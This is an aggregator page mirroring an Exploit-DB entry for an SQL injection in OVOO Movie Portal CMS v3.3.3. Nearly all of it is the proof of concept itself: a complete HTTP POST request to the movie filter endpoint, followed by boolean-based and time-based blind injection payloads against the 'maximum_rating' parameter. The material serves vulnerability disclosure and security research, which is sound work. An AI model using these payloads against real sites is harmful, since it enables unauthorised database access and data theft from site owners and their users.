8

[webapps] OVOO Movie Portal CMS v3.3.3 - SQL Injection

 8 months ago
source link: https://www.exploit-db.com/exploits/51691
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

OVOO Movie Portal CMS v3.3.3 - SQL Injection

EDB-ID:

51691

EDB Verified:

Platform:

PHP

Date:

2023-08-21

Vulnerable App:

# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###
POST /filter_movies/1 HTTP/2
Host: localhost
Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/movies.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: htts://localhost
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1

### Parameter & Payloads ###
Parameter: maximum_rating (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND
2238=2238&page=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT
4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK